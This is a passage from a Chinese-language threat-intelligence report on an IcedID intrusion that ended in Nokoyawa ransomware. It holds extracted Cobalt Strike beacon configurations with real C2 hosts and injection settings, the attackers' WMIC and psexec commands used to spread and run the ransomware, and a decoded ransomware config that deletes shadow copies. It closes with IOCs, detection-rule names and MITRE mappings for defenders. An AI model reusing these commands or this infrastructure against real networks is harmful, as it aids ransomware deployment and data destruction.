"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrr8AvQMH9nOuqc7x6r58gsuNMYuuRdKcMgo3iPMjQgM1u5BNXqKJBnOPlz6j+wbv+L9/BM6+oKDxxXEzsEMHxGaD49lXoKoA5RVtEgh9CnVFKN2bcqIZsbc64l+Ty7DXkUI1eHmTo4Lz8vXy4098Q4ll8YZOn8+8jnqU2QV4OWwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",    "port": "8081",    "hostname": "iconnectgs.com"  },  "beacontype": ["HTTP"],  "kill_date": null,  "license_id": "0",  "jitter": "43",  "sleeptime": "62004",  "http_get": {    "server": {      "output": ["print", "prepend 338 characters", "base64", "base64"]    },    "client": {      "metadata": [],      "headers": []    },    "verb": "GET",    "uri": "/hr"  },  "cfg_caution": "false",  "host_header": "",  "crypto_scheme": "0",  "http_post": {    "client": {      "output": [],      "id": [],      "headers": []    },    "verb": "POST",    "uri": "/mobile-home"  }}, {  "spawnto": "AAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",  "pipename": null,  "dns_beacon": {    "put_metadata": null,    "get_TXT": null,    "get_AAAA": null,    "get_A": null,    "beacon": null,    "maxdns": null,    "dns_sleep": null,    "put_output": null,    "dns_idle": null  },  "smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "post_ex": {    "spawnto_x64": "%windir%\\sysnative\\svchost.exe",    "spawnto_x86": "%windir%\\syswow64\\svchost.exe"  },  "stage": {    "cleanup": "true"  },  "process_inject": {    "stub": "snNvHLupDUIob8Qr+6dPTQ\u003d\u003d",    "transform_x64": ["prepend \u0027\\x90\\x90\\x90\\x90\u0027"],    "transform_x86": ["prepend \u0027\\x90\\x90\\x90\\x90\u0027"],    "startrwx": "false",    "min_alloc": "5271",    "userwx": "false",    "execute": ["CreateThread", "RtlCreateUserThread", "CreateRemoteThread"],    "allocator": "VirtualAllocEx"  },  "uses_cookies": "true",  "http_post_chunk": "0",  "ssh": {    "privatekey": null,    "username": null,    "password": null,    "port": null,    "hostname": null  },  "useragent_header": null,  "maxgetsize": "1864478",  "proxy": {    "behavior": "Use IE settings",    "password": null,    "username": null,    "type": null  },  "tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "server": {    "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrr8AvQMH9nOuqc7x6r58gsuNMYuuRdKcMgo3iPMjQgM1u5BNXqKJBnOPlz6j+wbv+L9/BM6+oKDxxXEzsEMHxGaD49lXoKoA5RVtEgh9CnVFKN2bcqIZsbc64l+Ty7DXkUI1eHmTo4Lz8vXy4098Q4ll8YZOn8+8jnqU2QV4OWwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",    "port": "8081",    "hostname": "iconnectgs.com"  },  "beacontype": ["HTTP"],  "kill_date": null,  "license_id": "0",  "jitter": "43",  "sleeptime": "62004",  "http_get": {    "server": {      "output": ["print", "prepend 338 characters", "base64", "base64"]    },    "client": {      "metadata": [],      "headers": []    },    "verb": "GET",    "uri": "/hr"  },  "cfg_caution": "false",  "host_header": "",  "crypto_scheme": "0",  "http_post": {    "client": {      "output": [],      "id": [],      "headers": []    },    "verb": "POST",    "uri": "/mobile-home"  }}]

Domain	IP	Port	JA3	JA3s
N/A	5.8.18.242	443	72a589da586844d7f0818ce684948eea	f176ba63b4d68e576b5ba345bec2c7b7

[{  "spawnto": "AAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",  "pipename": null,  "dns_beacon": {    "put_metadata": null,    "get_TXT": null,    "get_AAAA": null,    "get_A": null,    "beacon": null,    "maxdns": null,    "dns_sleep": null,    "put_output": null,    "dns_idle": null  },  "smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "post_ex": {    "spawnto_x64": "%windir%\\sysnative\\rundll32.exe",    "spawnto_x86": "%windir%\\syswow64\\rundll32.exe"  },  "stage": {    "cleanup": "false"  },  "process_inject": {    "stub": "tUr+Aexqde3zXhpE+L05KQ\u003d\u003d",    "transform_x64": [],    "transform_x86": [],    "startrwx": "true",    "min_alloc": "0",    "userwx": "true",    "execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"],    "allocator": "VirtualAllocEx"  },  "uses_cookies": "true",  "http_post_chunk": "0",  "ssh": {    "privatekey": null,    "username": null,    "password": null,    "port": null,    "hostname": null  },  "useragent_header": null,  "maxgetsize": "1048576",  "proxy": {    "behavior": "Use IE settings",    "password": null,    "username": null,    "type": null  },  "tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "server": {    "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJhcL+QgQWtf6S7zPp5hjImG+2YcPl18geU4f5JlSPXHwilbK4DFb/ePWyKFjhrA7emVRqhM21QMlo1ANsn14rY/RO2pzuft8P7TXoIjjI/B2GGVuzYNZX6X4I2EwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",    "port": "80",    "hostname": "5.8.18.242"  },  "beacontype": ["HTTP"],  "kill_date": null,  "license_id": "305419776",  "jitter": "0",  "sleeptime": "60000",  "http_get": {    "server": {      "output": ["print"]    },    "client": {      "metadata": [],      "headers": []    },    "verb": "GET",    "uri": "/pixel.gif"  },  "cfg_caution": "false",  "host_header": "",  "crypto_scheme": "0",  "http_post": {    "client": {      "output": [],      "id": [],      "headers": []    },    "verb": "POST",    "uri": "/submit.php"  }}, {  "spawnto": "AAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",  "pipename": null,  "dns_beacon": {    "put_metadata": null,    "get_TXT": null,    "get_AAAA": null,    "get_A": null,    "beacon": null,    "maxdns": null,    "dns_sleep": null,    "put_output": null,    "dns_idle": null  },  "smb_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "post_ex": {    "spawnto_x64": "%windir%\\sysnative\\rundll32.exe",    "spawnto_x86": "%windir%\\syswow64\\rundll32.exe"  },  "stage": {    "cleanup": "false"  },  "process_inject": {    "stub": "tUr+Aexqde3zXhpE+L05KQ\u003d\u003d",    "transform_x64": [],    "transform_x86": [],    "startrwx": "true",    "min_alloc": "0",    "userwx": "true",    "execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"],    "allocator": "VirtualAllocEx"  },  "uses_cookies": "true",  "http_post_chunk": "0",  "ssh": {    "privatekey": null,    "username": null,    "password": null,    "port": null,    "hostname": null  },  "useragent_header": null,  "maxgetsize": "1048576",  "proxy": {    "behavior": "Use IE settings",    "password": null,    "username": null,    "type": null  },  "tcp_frame_header": "AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d",  "server": {    "publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJhcL+QgQWtf6S7zPp5hjImG+2YcPl18geU4f5JlSPXHwilbK4DFb/ePWyKFjhrA7emVRqhM21QMlo1ANsn14rY/RO2pzuft8P7TXoIjjI/B2GGVuzYNZX6X4I2EwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u003d\u003d",    "port": "443",    "hostname": "5.8.18.242"  },  "beacontype": ["HTTPS"],  "kill_date": null,  "license_id": "305419776",  "jitter": "0",  "sleeptime": "60000",  "http_get": {    "server": {      "output": ["print"]    },    "client": {      "metadata": [],      "headers": []    },    "verb": "GET",    "uri": "/dot.gif"  },  "cfg_caution": "false",  "host_header": "",  "crypto_scheme": "0",  "http_post": {    "client": {      "output": [],      "id": [],      "headers": []    },    "verb": "POST",    "uri": "/submit.php"  }}]

数据泄露

在入侵期间，我们发现攻击者在网络共享中搜寻密码本相关文件，并且攻击者将文件复制出受害网络后打开查看，因为文件中包含的token触发了canary告警。除此之外，我们未发现其他数据泄露，但攻击者有可能通过加密的C2通信来传输窃取到的文件。

攻击者打开canary文件的源IP是：45.61.139.126

达成目标

攻击者从一台服务器开始向其他服务器部署Nokoyawa勒索软件，起初他们使用WMI复制k.exe和p.bat文件到其他主机的命令如下：

wmic /node:"TARGET_HOST_IP" /user:"DOMAIN\USER" /password:"PASSWORD" process call create "cmd.exe /c copy \\SOURCE_SERVER_IP\c$\windows\temp\p.bat c:\windows\temp\"

WMI命令执行会产生进程WmiPrvSE.exe执行命令

cmd.exe /c copy \\SOURCE_SERVER_IP\c$\windows\temp\k.exe c:\windows\temp\

命令执行后会产生SMB流量

批处理脚本会执行k.exe并传递一个base64编码的配置参数

c:\windows\temp\k.exe --config REDACTED

配置参数解码后内容如下

{"EXTENSION": "AWAYOKON", "NOTE_NAME": "AWAYOKON-readme.txt", "NOTE_CONTENT": "REDACTED", "ECC_PUBLIC": "lHrYQm+P3IbmyjTop2FK0qUdwOcSgHuFiT+r77bT4w0=", "SKIP_DIRS": ["windows", "program files", "program files (x86)", "appdata", "programdata", "system volume information", ""], "SKIP_EXTS": [".exe", ".dll", ".ini", ".lnk", ".url", ""], "ENCRYPT_NETWORK": true, "LOAD_HIDDEN_DRIVES": true, "DELETE_SHADOW": true}

配置文件指明了加密文件的扩展名、勒索信名称和Base64编码的勒索信内容，并且排除了一些不进行加密的文件和路径。DELETE_SHADOW设置成true后，勒索软件会删除卷影副本以防止数据恢复。

根据配置文件参数和代码使用C++开发，我们推测是1.1版本的Nokoyawa（https://www.zscaler.com/blogs/security-research/nevada-ransomware-yet-another-nokoyawa-variant）

代码特征显示开发语言为C/C++

调试信息显示这个二进制文件是在开始加密前几个小时编译完成的

之后攻击者大规模部署勒索软件进行全域加密

psexec.exe  \\TARGET_HOST_IP -u DOMAIN\USER -p "PASSWORD" -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\p.bat

勒索信内容如下：

加密后，在攻击者指定的网站联系勒索组织，勒索赎金为价值约200,000 美元的比特币。这次入侵没有支付赎金。

时间线

钻石模型

检测建议

基础情报

Cobalt Strike
50.3.132[.]232:8081 / iconnectgs[.]com
5.8.18[.]242:443
23.29.115[.]152:757 / aicsoftware[.]com
23.29.115[.]152:8080 / aicsoftware[.]comPowershell Cobalt Strike Downloader
https://aicsoftware[.]com:757/coin
IcedID Excel Download URL
https://simipimi[.]com
IcedID C2
kicknocisd[.]com
159.65.169[.]200
45.66.248[.]119:443 /  guaracheza[.]pics |  belliecow[.]wiki
198.244.180.66:443 /  curabiebarristie[.]com |  stayersa[.]art
BackConnect
137.74.104[.]108:8080

文件情报

1.bat
b5db398832461be8d93fdbda120088aa
b36748a27b8e68710701286106ad434c9afea6fa
30a334da51d22b2fe6e33970df8d0f81396394de9d3a3c224751aacb2202b0db

1.dll
9740f2b8aeacc180d32fc79c46333178
c599c32d6674c01d65bff6c7710e94b6d1f36869
d3db55cd5677b176eb837a536b53ed8c5eabbfd68f64b88dd083dc9ce9ffb64e

4_202210250456866742.xls
d3032968085db665381d9cbd3569f330
9230520c6dd215e2152bb2e56b2a5d6b45ae8e13
eb84a283ff58906786d63ffe43a8ff2728584428f5f7d9972c664f63f8790113

7030270
964c94b217d102e53a227bcbc94ae52e
b846e89d0f56851696d50b5e64c6e758ddae3e6a
091886c95ca946aedee24b7c751b5067c5ac875923caba4d3cc9d961efadb65d

k.exe
40c9dc2897b6b348da88b23deb0d3952
0f5457b123e60636623f585cc2bf2729f13a95d6
7095beafff5837070a89407c1bf3c6acf8221ed786e0697f6c578d4c3de0efd6

mstdc.exe
7dae150c1df0e01467be3a743775b646
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748

p.bat
385d21c0438f5b21920aa9eb894740d2
5d2c17799dfc6717f89cd5f63951829aed038041
e351ba5e50743215e8e99b5f260671ca8766886f69d84eabb83e99d55884bc2f

IPS规则

ET MALWARE Win32/IcedID Request Cookie
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
NF - Malware IcedID BackConnect - Wait Command
NF - Malware IcedID BackConnect - Start VNC command - 11
ET MALWARE Meterpreter or Other Reverse Shell SSL Cert
ET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike
ET MALWARE Cobalt Strike Malleable C2 Profile (__session__id Cookie)
ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET POLICY PsExec service created
ET POLICY SMB Executable File Transfer
ET POLICY SMB2 NT Create AndX Request For a .bat File
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement

Sigma

https://github.com/SigmaHQ/sigma

New Process Created Via Wmic.EXE id: 526be59f-a573-4eea-b5f7-f0973207634d

Potential Recon Activity Via Nltest.EXE id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248

Created Files by Office Applications id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4

CobaltStrike Named Pipe id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2

Suspicious Group And Account Reconnaissance Activity Using Net.EXE id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0

PowerShell Download and Execution Cradles id: 85b0b087-eddf-4a2b-b033-d771fa2b9775

Meterpreter or Cobalt Strike Getsystem Service Installation – Security id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34

Credential Dumping Tools Accessing LSASS Memory id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d

Potential Defense Evasion Via Rename Of Highly Relevant Binaries id: 0ba1da6d-b6ce-4366-828c-18826c9de23e

https://github.com/The-DFIR-Report/Sigma-Rules

AdFind Discovery id: 50046619-1037-49d7-91aa-54fc92923604

CHCP CodePage Locale Lookup id: dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f

Yara

https://github.com/The-DFIR-Report/Yara-Rules/blob/main/18190/18190.yar

MITRE

Access Token Manipulation: Token Impersonation/Theft - T1134.001
Account Discovery: Local Account - T1087.001
Account Discovery: Domain Account - T1087.002
Application Layer Protocol: Web Protocols - T1071.001
Command and Scripting Interpreter: Windows Command Shell - T1059.003
Command-Line Interface: PowerShell - T1059.001
Command-Line Interface: Visual Basic - T1059.005
Data Encrypted for Impact - T1486
Domain Trust Discovery - T1482
File and Directory Discovery - T1083
Indicator Removal on Host: File Deletion - T1070.004
Masquerading: Rename System Utilities - T1036.003
Phishing: Spearphishing Attachment - T1566.001
Process Injection – T1055
Remote Services: RDP - T1021.001
Remote Services: SMB/Windows Admin Shares - T1021.002
Remote System Discovery - T1018
Scheduled Task/Job: Scheduled Task - T1053.005
System Binary Proxy Execution: Rundll32 - T1218.011
System Network Configuration Discovery - T1016
Valid Accounts - T1078
WMI - T1047
Unsecured Credentials: Credentials In Files - T1552.001
User Execution: Malicious File - T1204.002
Remote Services: Windows Remote Management - T1021.006
Exfiltration Over C2 Channel - T1041
Archive Collected Data: Archive via Utility - T1560.001
Ingress Tool Transfer - T1105
Web Service - T1102
OS Credential Dumping: LSASS Memory - T1003.001
Remote Access Software - T1219

AdFind - S0552
IcedID - S0483
ipconfig - S0100
net - S0039
nltest - S0359
ping - S0097
systeminfo - S0096
cmd - S0106
Cobalt Strike - S0154
PsExec - S0029

文章来源: http://mp.weixin.qq.com/s?__biz=MzkzMDE3ODc1Mw==&mid=2247486348&idx=1&sn=20a11b4e78df07fb7662f82de5043aea&chksm=c27f7822f508f134c44a263256bba8843ab3b01a1c310a75c1f95964e4f709db9bab2ed65a60#rd
如有侵权请联系:admin#unsafe.sh